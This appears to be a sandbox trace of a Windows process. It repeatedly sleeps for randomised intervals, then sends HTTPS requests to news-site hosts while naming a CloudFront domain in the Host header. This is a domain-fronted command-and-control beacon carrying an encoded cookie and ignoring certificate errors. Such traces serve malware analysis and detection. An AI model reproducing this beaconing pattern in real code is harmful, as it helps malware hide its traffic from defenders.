Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:29 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:29 (Local Time) True 1
System Sleep duration = 12500 milliseconds (12.500 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:40 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:40 (Local Time) True 1
System Sleep duration = 13040 milliseconds (13.040 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:51 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:51 (Local Time) True 1
System Sleep duration = 12857 milliseconds (12.857 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:02 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:02 (Local Time) True 1
System Sleep duration = 12915 milliseconds (12.915 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:13 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:13 (Local Time) True 1
System Sleep duration = 13016 milliseconds (13.016 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:23 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:23 (Local Time) True 1
System Sleep duration = 12999 milliseconds (12.999 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:34 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:34 (Local Time) True 1
System Sleep duration = 13358 milliseconds (13.358 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:45 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:45 (Local Time) True 1
System Sleep duration = 13296 milliseconds (13.296 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:56 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:32:56 (Local Time) True 1
System Sleep duration = 13658 milliseconds (13.658 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:33:07 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:33:07 (Local Time) True 1
System Sleep duration = 12319 milliseconds (12.319 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:33:18 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:33:18 (Local Time) True 1
System Sleep duration = 12815 milliseconds (12.815 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:33:28 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:33:28 (Local Time) True 1
System Sleep duration = 13671 milliseconds (13.671 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:39 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:39 (Local Time) True 1
Fn
System Sleep duration = 12728 milliseconds (12.728 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:50 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:33:50 (Local Time) True 1
Fn
System Sleep duration = 13107 milliseconds (13.107 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:01 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:01 (Local Time) True 1
Fn
System Sleep duration = 12762 milliseconds (12.762 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:11 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:11 (Local Time) True 1
Fn
System Sleep duration = 14342 milliseconds (14.342 seconds) True 1
Fn
